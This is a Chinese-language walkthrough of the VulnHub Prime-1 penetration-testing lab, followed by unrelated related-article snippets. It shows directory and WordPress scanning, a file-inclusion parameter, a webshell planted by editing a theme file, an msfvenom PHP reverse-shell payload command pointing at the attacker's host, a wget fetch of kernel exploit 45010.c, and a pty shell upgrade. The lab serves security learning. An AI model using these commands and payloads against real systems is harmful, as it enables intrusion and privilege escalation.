渗透测试——prime1靶场实战演练{常用工具}端口转发

文章目录

    • 概要
    • 信息搜集

概要

靶机地址:https://www.vulnhub.com/entry/prime-1,358

信息搜集

nmap
扫网段存活ip及端口
在这里插入图片描述
找到除了网关外的ip,开放了80端口,登上去看看
在这里插入图片描述
是一个网站,直接上科技扫一扫目录

 python dirsearch.py -u http://192.168.203.152

在这里插入图片描述
扫从出来了常见的wordpress,nice。
那么就使用wpscan…

wpscan --url http://ip/wordpress/ --e u

在这里插入图片描述
扫到一个用户victor,联想到靶机开放了22ssh,那么找到密码就可以尝试进ssh。
没有别的关键信息,换几个扫描工具试试了。。。

# dirb http://192.168.203.152 -X .zip,.txt,.rar,.php

在这里插入图片描述
找到image.php,index.php,sevret.txt
再看看别的工具

# gobuster dir -u http://192.168.203.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.tar,.zip

在这里插入图片描述
一样的效果,看来就这些了
再换几个工具试试

dirsearch -u http://192.168.203.152  -e zip,php,txt,rar,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
这个速度好慢啊,而且结果不是那么明白。
换一个

feroxbuster -u http://192.168.203.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

在这里插入图片描述
速度比dirsearch快一点点,结果还是不理想。只扫出来wp。
接下来把搜集到的东西挨个去访问,前两个都是图片,有个secret.txt打开是提示。。
在这里插入图片描述
在这里插入图片描述
让我们查看location.txt,试试能看吗。
在这里插入图片描述

让我们使用fuzz来测试参数,那么就应该想到文件包含了,先试试fuzz

apt-get install wfuzz wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw=12 "http://192.168.203.152//index.php?FUZZ=aaaa"

隐藏掉所有响应报文字数为 12 的结果后得到了一个 file 参数:

在这里插入图片描述
利用file去包含location.txt
在这里插入图片描述
在这里插入图片描述
让我们在其他php页面使用那个参数,那么很明显就剩一个了。
在这里插入图片描述
更换参数发现没啥显示,尝试文件包含试试
在这里插入图片描述
直接包含到大动脉了,
仔细找找看看能有啥发现
在这里插入图片描述
这个是显示两个用户,一个victor,一个saket,还显示某个地方存在一个passwd文件,
试试文件包含

在这里插入图片描述
那么这个应该是victor的密码了,尝试ssh登录
在这里插入图片描述

明显没有那么简单就上去,那么就想想这个密码会是什么地方的?
“wordpress”
前面是扫出来了登录页面的
我们去试试看能登陆上吗
在这里插入图片描述
先试试victor
发现直接登录了,
找一下有没有可以写入文件的地方
找到了一处有更新按钮的php文件
在这里插入图片描述
里面还有人留下过东西,那么应该就是这了
那就上大动作
在这里插入图片描述
蚁剑上

在这里插入图片描述
这个是路径

http://192.168.203.152/wordpress/wp-content/themes/twentynineteen/secret.php

似乎有点太顺利了,

果然尝试nc,python等反弹shell方法均无效,那么就
只能想其他办法了
msfvenom 嗯
因为电脑已经开了一个win虚拟机,靶机,再开一个kali直接爆炸了,

在这里插入图片描述

于是我
直接用我昨天做的隔空kali
有兴趣去上一个作品
在这里插入图片描述
服务器开了,kali去连接就行了,接下来的数据都通过服务器处理
在这里插入图片描述

现在才觉得
顺序是多么重要。
在这里插入图片描述
刚刚在上面使用命令知道了,这个内核是有漏洞的,所以直接使用

在这里插入图片描述
看见有个45010.c
把他下载下来,


searchsploit -m exploit/linux/local/45010.c

然后上msf

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php

这个我使用的公网转发,用内网地址代替了,其实是用公网转发到另一套电脑的。
然后就把生成的shell的内容复制到secret.php,并更新他,
接着就是msf组合拳
msfconsole
在这里插入图片描述
为啥是127.0.0.1,因为做了转发 ,没明白的看下上一篇。
在这里插入图片描述
这样就打进shell了,上面我们还下载了45010.c内核漏洞提权文件
然后我们用python打开一个http服务来让另一台电脑能访问并下载我们的文件。

python -m http.server 8888

监听一下 ,在msf里面操作下载文件,

wget http://192.168.199.128/45010.c#desktop
#在哪里打开的就是根目录,直接跟上文件就行 

在这里插入图片描述
因为这个是在蚂蚁中完成的,所以图是这样的
不影响接下来的提权
在这里插入图片描述
在msf里面试试也是不行,
但是我发现靶机是有python的
所以想到了pty伪终端
利用python的pty模块创建一个伪终端,

 python -c:‌这是Python命令行工具的一个选项,‌用于执行紧跟在-c后面的Python代码。‌import pty;:‌这行代码导入了Python的pty模块,‌该模块提供了一些用于创建和管理伪终端的功能。‌pty.spawn('/bin/bash');:‌这行代码使用pty模块的spawn函数来启动一个新的bash shell。‌/bin/bash是bash shell的默认路径,‌spawn函数会创建一个新的进程,‌并在该进程中运行指定的命令(‌在这个例子中是bash shell)‌。‌python3 -c "import pty;pty.spawn('/bin/bash');"
然后给编译的450加个执行的权限

发现不能执行,找到了tmp文件夹,发现可以执行,所以直接来试试
在这里插入图片描述
ok了查看root文件夹
在这里插入图片描述
这就是密钥吧
exit退出后使用sudo -l再看看
在这里插入图片描述
发现enc可以以root方法执行
在这里插入图片描述
找了一下备份密码

find / -name '*backup*' 2>dev/nul

在这里插入图片描述
然后去执行enc
在这里插入图片描述
生成了两个文档

需要解密才行
剩下的交给以后的我,
把基础先学会了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/50135.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

尝试带你理解 - 进程地址空间,写时拷贝

序言 在上一篇文章 进程概念以及进程状态&#xff0c;我们提到了 fork 函数&#xff0c;该函数可以帮我们创建一个子进程。在使用 fork 函数时&#xff0c;我们会发现一些奇怪的现象&#xff0c;举个栗子&#xff1a; 1 #include <stdio.h>2 #include <unistd.h>3 …

跟《经济学人》学英文:2024年07月20日这期 The Russell 2000 puts in a historic performance

Why investors have fallen in love with small American firms The Russell 2000 puts in a historic performance 罗素2000指数&#xff1a; 罗素2000指数&#xff08;英语&#xff1a;Russell 2000 Index&#xff09;为罗素3000指数中收录市值最小的2000家&#xff08;排序…

Linux 常用命令详解:从基础操作到进阶应用

Linux 常用命令详解&#xff1a;从基础操作到进阶应用 简介 Linux 是一个强大且灵活的操作系统&#xff0c;它在服务器、开发环境和个人计算机中得到了广泛的应用。Linux 的命令行界面提供了丰富的工具和命令&#xff0c;可以帮助用户高效地管理系统、处理文件、监控性能和进…

WebKit的暗黑魅力:全面拥抱Dark Mode

WebKit的暗黑魅力&#xff1a;全面拥抱Dark Mode 在当今数字时代&#xff0c;用户越来越注重个性化体验和视觉舒适度。暗黑模式&#xff08;Dark Mode&#xff09;作为一种新兴的界面风格&#xff0c;以其减轻视觉疲劳和节省电量的特点&#xff0c;迅速受到用户的青睐。WebKit…

学习笔记 韩顺平 零基础30天学会Java(2024.7.25)

P425 枚举类引出 举了一个例子&#xff0c;季节类创建对象&#xff0c;但是根据Java的规则&#xff0c;可以设置春夏秋冬以外的对象&#xff0c;而且可以修改&#xff0c;这样就会不符合实际&#xff0c;因此引出枚举 P426 自定义枚举类 1.构造器私有化&#xff0c;使外面没有办…

深入解析 GPT-4o mini:强大功能与创新应用

&#x1f4e2;博客主页&#xff1a;https://blog.csdn.net/2301_779549673 &#x1f4e2;欢迎点赞 &#x1f44d; 收藏 ⭐留言 &#x1f4dd; 如有错误敬请指正&#xff01; &#x1f4e2;本文由 JohnKi 原创&#xff0c;首发于 CSDN&#x1f649; &#x1f4e2;未来很长&#…

【Vue实战教程】之Vue项目中的异步请求

Vue的异步请求 1 axios的安装与使用 Axios是一个基于promise的HTTP库&#xff0c;主要用来向服务端发起请求&#xff0c;可以在请求中做更多可控的操作&#xff0c;例如拦截请求等。 Axios可以使用在浏览器和node.js中&#xff0c;Vue、React等前端框架的广泛普及&#xff0c…

C++ 列式内存布局数据存储格式 Arrow

Apache Arrow 优点 : 高性能数据处理&#xff1a; Arrow 使用列式内存布局&#xff0c;这特别适合于数据分析和查询操作&#xff0c;因为它允许对数据进行高效批量处理&#xff0c;减少CPU缓存未命中&#xff0c;从而提升处理速度。 零拷贝数据共享&#xff1a; Arrow …

【YashanDB知识库】yasdb jdbc驱动集成druid连接池,业务(java)日志中有token IDENTIFIER start异常

问题现象 客户的java日志中有如下异常信息&#xff1a; 问题的风险及影响 对正常的业务流程无影响&#xff0c;但是影响druid的merge sql功能&#xff08;此功能会将sql语句中的字面量替换为绑定变量&#xff0c;然后将替换以后的sql视为同一个&#xff0c;然后用做执行性能统…

Vue3扁平化Tree组件的前端分页实现

大家好&#xff0c;我是小卷。得益于JuanTree的扁平化设计&#xff0c;在数据量很大的情况下除了懒加载&#xff0c;使用前端分页也是一种解决渲染性能问题的可选方案。 用法 要实现的文档&#xff1a; 分页效果&#xff1a; 实现 新增属性&#xff1a; 组件setup方法中新增…

程序员加班现象:成因、影响与应对策略

&#x1f34e;个人博客&#xff1a;个人主页 &#x1f3c6;个人专栏&#xff1a;日常聊聊 ⛳️ 功不唐捐&#xff0c;玉汝于成 目录 前言 正文 加班的成因 加班的影响 应对策略 结语 我的其他博客 前言 在现代科技行业中&#xff0c;加班现象已成为一个普遍存在的问题…

proxy是什么,vue3是怎么使用proxy的

Vue 3 使用了 Proxy 作为其响应式系统的基础&#xff0c;这是因为 Proxy 提供了一种更为强大和灵活的方式来实现对象和数组的响应式特性。下面是 Proxy 的一些关键特性以及它们是如何在 Vue 3 中体现并提升响应式性能的&#xff1a; 什么是 Proxy&#xff1f; Proxy 是 ES6 中…

配置sublime的中的C++编译器(.sublime-build),实现C++20

GCC 4.8: 支持 C11 (部分) GCC 4.9: 支持 C11 和 C14 (部分) GCC 5: 完全支持 C14 GCC 6: 支持 C14 和 C17 (部分) GCC 7: 支持 C17 (大部分) GCC 8: 完全支持 C17&#xff0c;部分支持 C20 GCC 9: 支持更多的 C20 特性 GCC 10: 支持大部分 C20 特性 GCC 11: 更全面地支持 C20 …

Android 线程池的面试题 线程线程池面试题

1.为什么要用线程池 降低资源消耗&#xff1a;通过复用线程&#xff0c;降低创建和销毁线程的损耗。 提高响应速度&#xff1a;任务不需要等待线程创建就能立即执行。 提高线程的可管理性&#xff1a;使用线程池可以进行统一的分配、调优和监控。 2. 线程池执行流程&#xff08…

ES中的数据类型学习之ARRAY

Arrays | Elasticsearch Guide [7.17] | Elastic 中文翻译 &#xff1a;Array Elasticsearch 5.4 中文文档 看云 Arrays In Elasticsearch, there is no dedicated array data type. Any field can contain zero or more values by default, however, all values in the a…

SpringBoot 自动配置原理

一、Condition Condition 是在 Spring 4.0 增加的条件判断功能&#xff0c;通过这个可以功能可以实现选择性的创建 Bean 操 作。 思考&#xff1a; SpringBoot 是如何知道要创建哪个 Bean 的&#xff1f;比如 SpringBoot 是如何知道要创建 RedisTemplate 的&#xff1f; …

mysql的B+树索引结构介绍

一、B树 特性&#xff1a; 所有的叶子结点中包含了全部关键字的信息&#xff0c;非叶子节点只存储键值信息&#xff0c;及指向含有这些关键字记录的指针&#xff0c;且叶子结点本身依关键字的大小自小而大的顺序链接&#xff0c;所有的非终端结点可以看成是索引部分&#xff0…

MySQL数据库基本用法

了解数据库基本概念 什么是数据库&#xff1f; • 长期存放在计算机内&#xff0c;有组织、可共享的大量数据的集合&#xff0c;是一个数据“仓库” MySQL数据库的特点 • 开源免费&#xff0c;小巧但功能齐全 • 可在Windows和Linux系统上运行 • 操作方便&#xff0c;…

Hive 的 classpath 简介

Hive的classpath是Hive运行时用于查找所需类和资源文件的路径集合。它包含了Hive运行所需的所有JAR文件和配置文件的位置。理解和管理Hive的classpath对于确保Hive正常运行、添加自定义库或解决类加载问题非常重要。 以下是关于Hive classpath的一些关键点&#xff1a; 默认位…

昇思25天学习打卡营第22天|munger85

LSTMCRF序列标注 我们希望得到这个模型来对词进行标注&#xff0c;B是开始&#xff0c;I是实体词的非开始&#xff0c;O是非实体词。 我们首先需要lstm对序列里token的记忆&#xff0c;和计算每个token发到crf的分数&#xff0c;发完了再退出来&#xff0c;最后形成1模型。那么…